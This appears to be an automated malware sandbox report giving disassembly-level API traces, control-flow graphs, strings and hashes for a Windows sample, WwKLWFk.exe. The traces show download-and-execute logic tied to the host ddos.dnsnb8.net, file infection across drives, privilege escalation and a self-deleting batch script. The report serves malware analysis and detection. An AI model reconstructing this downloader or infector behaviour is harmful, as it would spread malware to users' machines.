                                    • Instruction ID: 14f8d796dc444a06c8ebbd05be9225cb89a1379ebf53b14cdf10aa9932084c4b
                                    • Opcode Fuzzy Hash: 758f1645c6d9e930e2fbb713a21255efb752cec19bacd27d69169bc3326293a1
                                    • Instruction Fuzzy Hash: B32153B694031C7BEB10E7A49C89FDB73ECDB04B4AF4405E1BA44E3151E6709F888AA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 126 b51973-b5199a PathFileExistsA 127 b51ac7-b51acc 126->127 128 b519a0-b519aa 126->128 130 b51ad0-b51ad5 127->130 131 b51ace 127->131 129 b519af-b519c2 CreateFileA 128->129 132 b519c4-b519d3 Sleep 129->132 133 b51a28-b51a36 GetFileSize 129->133 134 b51ad7-b51ad9 130->134 135 b51af0-b51af6 130->135 131->130 132->129 136 b519d5-b51a0b call b5185b wsprintfA CopyFileA 132->136 137 b51a87-b51a8b 133->137 138 b51a38-b51a3b 133->138 134->135 136->133 150 b51a0d-b51a26 CreateFileA 136->150 139 b51a96-b51a9a 137->139 140 b51a8d-b51a90 FindCloseChangeNotification 137->140 138->137 142 b51a3d-b51a51 VirtualAlloc 138->142 143 b51aad-b51ab1 139->143 144 b51a9c 139->144 140->139 142->137 146 b51a53-b51a57 142->146 148 b51ab3-b51ab6 143->148 149 b51adb-b51ae0 143->149 147 b51aa0-b51aa7 DeleteFileA 144->147 151 b51a80 146->151 152 b51a59-b51a6d ReadFile 146->152 147->143 148->127 153 b51ab8-b51ac1 VirtualFree 148->153 155 b51ae7-b51aec 149->155 156 b51ae2-b51ae5 149->156 150->133 154 b51a9e 150->154 151->137 152->137 157 b51a6f-b51a7e 152->157 153->127 154->147 155->135 158 b51aee 155->158 156->155 157->151 157->152 158->135
                                    APIs
                                    • PathFileExistsA.KERNELBASE(00B54E54,77068400,00000000), ref: 00B51992
                                    • CreateFileA.KERNELBASE(00B54E54,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B519BA
                                    • Sleep.KERNEL32(00000064), ref: 00B519C6
                                    • wsprintfA.USER32 ref: 00B519EC
                                    • CopyFileA.KERNEL32(00B54E54,?,00000000), ref: 00B51A00
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B51A1E
                                    • GetFileSize.KERNEL32(00B54E54,00000000), ref: 00B51A2C
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00B51A46
                                    • ReadFile.KERNELBASE(00B54E54,00B54E58,00000000,?,00000000), ref: 00B51A65
                                    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00B51A90
                                    • DeleteFileA.KERNEL32(?), ref: 00B51AA7
                                    • VirtualFree.KERNEL32(00B54E58,00000000,00008000), ref: 00B51AC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                    • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\50ed6d56.exe
                                    • API String ID: 2523042076-3885149054
                                    • Opcode ID: 70462fd6123787db91fcc21a880e032319fe49348e44c2982dba4a5ba77d9257
                                    • Instruction ID: 662ada9450322dbe55ffa9f145ffa959e5f2797aa457b7df49741b995a0d98ce
                                    • Opcode Fuzzy Hash: 70462fd6123787db91fcc21a880e032319fe49348e44c2982dba4a5ba77d9257
                                    • Instruction Fuzzy Hash: 21515E71901219EFCB129F98CC84BAEBBF8EB04756F1449E9F925E2290C7309E48CB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 159 b528b8-b528ff memset wsprintfA 160 b52905-b5290d 159->160 161 b529db-b529df 159->161 160->161 162 b52913-b52919 160->162 163 b52956-b52965 strrchr 162->163 164 b5291b-b5294c memset wsprintfA call b529e2 162->164 163->161 166 b52967-b52978 lstrcmpiA 163->166 167 b52951 164->167 168 b52988-b52992 lstrcmpiA 166->168 169 b5297a-b52981 call b51e6e 166->169 167->161 168->161 170 b52994-b5299b 168->170 174 b52986 169->174 172 b529ad-b529c9 strstr 170->172 173 b5299d-b529a3 170->173 176 b529d3-b529d6 call b52692 172->176 177 b529cb-b529d1 call b5239d 172->177 173->172 175 b529a5-b529a7 lstrcpy 173->175 174->161 175->172 176->161 177->161
                                    APIs
                                    • memset.MSVCRT ref: 00B528D3
                                    • wsprintfA.USER32 ref: 00B528F7
                                    • memset.MSVCRT ref: 00B52925
                                    • wsprintfA.USER32 ref: 00B52940
                                      • Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52A02
                                      • Part of subcall function 00B529E2: wsprintfA.USER32 ref: 00B52A1A
                                      • Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52A44
                                      • Part of subcall function 00B529E2: lstrlen.KERNEL32(?), ref: 00B52A54
                                      • Part of subcall function 00B529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00B52A6C
                                      • Part of subcall function 00B529E2: strrchr.MSVCRT ref: 00B52A7C
                                      • Part of subcall function 00B529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00B52A9F
                                      • Part of subcall function 00B529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00B52AAE
                                      • Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52AC6
                                      • Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52ADA
                                      • Part of subcall function 00B529E2: FindFirstFileA.KERNELBASE(?,?), ref: 00B52AEF
                                      • Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52B13
                                    • strrchr.MSVCRT ref: 00B52959
                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00B52974
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                    • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                    • API String ID: 3004273771-1101464738
                                    • Opcode ID: 5dc7ca263002c850e652c41e0ebfe09ed1d5a694ff1864245f6fdc8cde988553
                                    • Instruction ID: 75614b8093a809646dc4696b5436f47b0d70a6e452a44ce6dce7a1ae1ceb701c
                                    • Opcode Fuzzy Hash: 5dc7ca263002c850e652c41e0ebfe09ed1d5a694ff1864245f6fdc8cde988553
                                    • Instruction Fuzzy Hash: DD31A77194130D6BEB20A764DC85FDA77ECDF16752F0404E2FD45A3281EAB59ACC8B60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 b51099-b510b4 182 b51199-b5119c 181->182 183 b510ba-b510c7 181->183 184 b510c8-b510d4 183->184 185 b51184-b51190 184->185 186 b510da 184->186 185->184 187 b51196-b51198 185->187 188 b51113-b51162 call b5185b wsprintfA * 2 URLDownloadToFileA 186->188 187->182 191 b510dc-b5110d call b51000 WinExec lstrlen 188->191 192 b51168-b51182 lstrlen Sleep 188->192 191->187 191->188 192->185 192->188
                                    APIs
                                      • Part of subcall function 00B5185B: GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
                                      • Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51878
                                      • Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51880
                                      • Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51890
                                      • Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51894
                                    • WinExec.KERNEL32(?,00000005), ref: 00B510F1
                                    • lstrlen.KERNEL32(00B54748), ref: 00B510FA
                                    • wsprintfA.USER32 ref: 00B5112A
                                    • wsprintfA.USER32 ref: 00B51143
                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00B5115B
                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00B51169
                                    • Sleep.KERNEL32 ref: 00B51179
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                    • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1280626985-1863643174
                                    • Opcode ID: 217512159a5739256db02fe7df237867b9146deca8386d8d098f21f62a81f8f7
                                    • Instruction ID: 3cfce0ae4edb15e6d3f775254a5983e6b7f4709f829ba3e5307cf964fc0ce787
                                    • Opcode Fuzzy Hash: 217512159a5739256db02fe7df237867b9146deca8386d8d098f21f62a81f8f7
                                    • Instruction Fuzzy Hash: 6F216B75900308BEDB21ABA4DC49BAEBBF8EB0575BF1544D5E900A3150DB749A888FA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 195 b51581-b515f9 call b5185b wsprintfA * 2 lstrlen CreateFileA 198 b51633-b51637 195->198 199 b515fb-b5161b WriteFile CloseHandle 195->199 199->198 200 b5161d-b5162d ShellExecuteA 199->200 200->198
                                    APIs
                                      • Part of subcall function 00B5185B: GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
                                      • Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51878
                                      • Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51880
                                      • Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51890
                                      • Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51894
                                    • wsprintfA.USER32 ref: 00B515AA
                                    • wsprintfA.USER32 ref: 00B515C6
                                    • lstrlen.KERNEL32(?), ref: 00B515D2
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00B515EE
                                    • WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00B51609
                                    • CloseHandle.KERNEL32(00000000), ref: 00B51612
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00B5162D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$open
                                    • API String ID: 617340118-3809860907
                                    • Opcode ID: f57bfe833e3e33bd2716cdbd297b05eed2f6a8e529113824c565e461a32f21d3
                                    • Instruction ID: b10402fe7a3db76687894954994b0dfe7c8a687d493a4b56ba52d85c7421c0a7
                                    • Opcode Fuzzy Hash: f57bfe833e3e33bd2716cdbd297b05eed2f6a8e529113824c565e461a32f21d3
                                    • Instruction Fuzzy Hash: 081154729012287AD72097A59C89FEB7AECDF59B92F0404D1F949E3150DE749B88CBB0

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00B5164F
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00B5165B
                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00000104), ref: 00B5166E
                                    • CreateThread.KERNELBASE(00000000,00000000,00B51099,00000000,00000000,00000000), ref: 00B516AC
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00B516BD
                                      • Part of subcall function 00B5139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B513BC
                                      • Part of subcall function 00B5139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B513DA
                                      • Part of subcall function 00B5139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B51448
                                    • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B516E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$C:\Windows\system32$Documents and Settings
                                    • API String ID: 123563730-3214399340
                                    • Opcode ID: b6c525920c75a2d6ed213f124f2666f435cbb0c98bb82a67edaf2c5de1c93f05
                                    • Instruction ID: a67c7471cad224f852b42ede204463d0a1a018a10cc84c83fde9bd7a1ea2d586
                                    • Opcode Fuzzy Hash: b6c525920c75a2d6ed213f124f2666f435cbb0c98bb82a67edaf2c5de1c93f05
                                    • Instruction Fuzzy Hash: 4211D6725413147BDF616BAC9D49F9B3EEDEB057A7F0404D0FA09921E0CA718988CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 220 b51000-b51023 CreateFileA 221 b51025-b51055 GetFileSize CreateFileMappingA MapViewOfFile 220->221 222 b51092-b51096 220->222 223 b51057-b5105f 221->223 224 b5107b-b51085 221->224 225 b51074-b51075 UnmapViewOfFile 223->225 226 b51061-b5106e call b517d0 223->226 227 b51087-b5108b CloseHandle 224->227 228 b5108d-b51091 CloseHandle 224->228 225->224 226->225 227->228 228->222
                                    APIs
                                    • CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B51018
                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B51029
                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00B51038
                                    • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B5104B
                                    • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B51075
                                    • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B5108B
                                    • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B5108E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1223616889-3273462101
                                    • Opcode ID: 38a22c2be5db90db54f2ada583bd33bb10647c5ba4b796a6b4de4fbfd121d2b9
                                    • Instruction ID: 7f69e805e109564fe83125617571c3ba593d2baf6e3a554d3226303cd542ef43
                                    • Opcode Fuzzy Hash: 38a22c2be5db90db54f2ada583bd33bb10647c5ba4b796a6b4de4fbfd121d2b9
                                    • Instruction Fuzzy Hash: 3401127150035DBFE6216F649C88F2B7BECDB44BDAF0849A9B645A31D0DA705E448A60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 380 b52b8c-b52bc6 memset GetLogicalDriveStringsA 381 b52c09-b52c28 WaitForMultipleObjects 380->381 382 b52bc8-b52bcc 380->382 383 b52c3c-b52c45 381->383 384 b52c2a-b52c3a CreateThread 381->384 385 b52bce-b52bd0 382->385 386 b52bfa-b52c07 lstrlen 382->386 384->383 385->386 387 b52bd2-b52bdc GetDriveTypeA 385->387 386->381 386->382 387->386 388 b52bde-b52be1 387->388 388->386 389 b52be3-b52bf6 CreateThread 388->389 389->386
                                    APIs
                                    • memset.MSVCRT ref: 00B52BA6
                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00B52BB4
                                    • GetDriveTypeA.KERNELBASE(?), ref: 00B52BD3
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00B52BEE
                                    • lstrlen.KERNEL32(?), ref: 00B52BFB
                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00B52C16
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00002845,00000000,00000000,00000000), ref: 00B52C3A
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                    • String ID:
                                    • API String ID: 1073171358-0
                                    • Opcode ID: 0ba8453472ceac8cd19ca8d308cb9cc589601ae945e2eef09b8f5e371304bb58
                                    • Instruction ID: dfffbd43de992a2fd8ece62b77efd0a71b962b00890cf02e642ae6bee9b5ec61
                                    • Opcode Fuzzy Hash: 0ba8453472ceac8cd19ca8d308cb9cc589601ae945e2eef09b8f5e371304bb58
                                    • Instruction Fuzzy Hash: E221C6B180138CAFE721AF649C84FAE7BEDFB0675AB140595FC4293151D7208D4ACB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 390 b52c48-b52c75 memset call b51973 393 b52c77-b52c7f 390->393 394 b52cb2-b52cb9 390->394 397 b52c81-b52c8b 393->397 398 b52c8f-b52cac CreateThread WaitForMultipleObjects 393->398 395 b52cc8-b52ccc 394->395 396 b52cbb-b52cc2 VirtualFree 394->396 396->395 397->398 398->394
                                    APIs
                                    • memset.MSVCRT ref: 00B52C57
                                      • Part of subcall function 00B51973: PathFileExistsA.KERNELBASE(00B54E54,77068400,00000000), ref: 00B51992
                                      • Part of subcall function 00B51973: CreateFileA.KERNELBASE(00B54E54,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B519BA
                                      • Part of subcall function 00B51973: Sleep.KERNEL32(00000064), ref: 00B519C6
                                      • Part of subcall function 00B51973: wsprintfA.USER32 ref: 00B519EC
                                      • Part of subcall function 00B51973: CopyFileA.KERNEL32(00B54E54,?,00000000), ref: 00B51A00
                                      • Part of subcall function 00B51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B51A1E
                                      • Part of subcall function 00B51973: GetFileSize.KERNEL32(00B54E54,00000000), ref: 00B51A2C
                                      • Part of subcall function 00B51973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00B51A46
                                      • Part of subcall function 00B51973: ReadFile.KERNELBASE(00B54E54,00B54E58,00000000,?,00000000), ref: 00B51A65
                                    • CreateThread.KERNELBASE(00000000,00000000,00B52B8C,00000000,00000000,00000000), ref: 00B52C99
                                    • WaitForMultipleObjects.KERNEL32(00000001,00B516BA,00000001,000000FF,?,00B516BA,00000000), ref: 00B52CAC
                                    • VirtualFree.KERNELBASE(00970000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00B54E5C,00B54E60,?,00B516BA,00000000), ref: 00B52CC2
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B52C69
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                    • API String ID: 2042498389-2197398117
                                    • Opcode ID: 7c38ea08ae22e1364fbef650c1f17d103829daa07355cbe54482badd22b2c354
                                    • Instruction ID: 75c7339f9443f22a7333eca1b262f9f86a472f3e525777941896f8d7ed2e6e0e
                                    • Opcode Fuzzy Hash: 7c38ea08ae22e1364fbef650c1f17d103829daa07355cbe54482badd22b2c354
                                    • Instruction Fuzzy Hash: 5F0171716423207AD61497959C0AFDF7EECEF02B66F5441D0BD05E62D2DAA09988C7A0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 399 b52845-b52855 call b5274a 402 b52857 399->402 403 b52878-b5288a DeleteFileA 399->403 406 b52865-b52876 call b52692 402->406 404 b5288c-b52894 VirtualFree 403->404 405 b5289a-b528a2 403->405 404->405 408 b528a4-b528a5 CloseHandle 405->408 409 b528ab-b528b5 405->409 406->403 411 b52859-b52860 call b5239d 406->411 408->409 411->406
                                    APIs
                                      • Part of subcall function 00B5274A: memset.MSVCRT ref: 00B52766
                                      • Part of subcall function 00B5274A: memset.MSVCRT ref: 00B52774
                                      • Part of subcall function 00B5274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00B52787
                                      • Part of subcall function 00B5274A: wsprintfA.USER32 ref: 00B527AB
                                      • Part of subcall function 00B5274A: wsprintfA.USER32 ref: 00B527C6
                                      • Part of subcall function 00B5274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\50ed6d56.exe,00000000), ref: 00B527D4
                                      • Part of subcall function 00B5274A: wsprintfA.USER32 ref: 00B527F4
                                      • Part of subcall function 00B5274A: DeleteFileA.KERNEL32(?,?,00B54E54,00B54E58), ref: 00B5281A
                                      • Part of subcall function 00B5274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00B54E54,00B54E58), ref: 00B52832
                                    • DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B5287D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00B52894
                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00B528A5
                                      • Part of subcall function 00B52692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00B52873,?,00000002), ref: 00B526A7
                                      • Part of subcall function 00B52692: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00B52873,?,00000002), ref: 00B526B5
                                      • Part of subcall function 00B52692: lstrlen.KERNEL32(?), ref: 00B526C4
                                      • Part of subcall function 00B52692: ??2@YAPAXI@Z.MSVCRT ref: 00B526CE
                                      • Part of subcall function 00B52692: lstrcpy.KERNEL32(00000004,?), ref: 00B526E3
                                      • Part of subcall function 00B52692: SetEvent.KERNEL32 ref: 00B5273C
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\50ed6d56.exe, xrefs: 00B52878
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
                                    • String ID: C:\Users\user\AppData\Local\Temp\50ed6d56.exe
                                    • API String ID: 2533558932-81216859
                                    • Opcode ID: 6735bfa1a392ac6892e245287df8408b6d3c19170ac52a22ebe4a45b311a5ddf
                                    • Instruction ID: 15e1d78decd5f6c7c58f74acecc036e8e22c137a8f056cbc95a92462c4118f8e
                                    • Opcode Fuzzy Hash: 6735bfa1a392ac6892e245287df8408b6d3c19170ac52a22ebe4a45b311a5ddf
                                    • Instruction Fuzzy Hash: D9F03A746413046BD720A7B4AD8BB5A33ECAB12747F1805E0BA15E31E0EFB8D98D8E55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 413 b514e1-b514fb 414 b51541-b51547 413->414 415 b514fd-b51510 GetModuleHandleA 413->415 418 b51573-b5157a call b51638 ExitProcess 414->418 419 b51549-b5154c 414->419 416 b51512-b51518 415->416 417 b5151a-b51535 VirtualQuery 415->417 416->414 420 b51537-b51539 417->420 421 b5153b 417->421 422 b5154e-b51555 419->422 423 b51569-b51570 419->423 420->414 420->421 421->414 422->423 425 b51557-b51566 call b51af9 422->425 425->423
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00B51504
                                    • VirtualQuery.KERNEL32(00B514E1,?,0000001C), ref: 00B51525
                                    • ExitProcess.KERNEL32 ref: 00B5157A
                                    Memory Dump Source
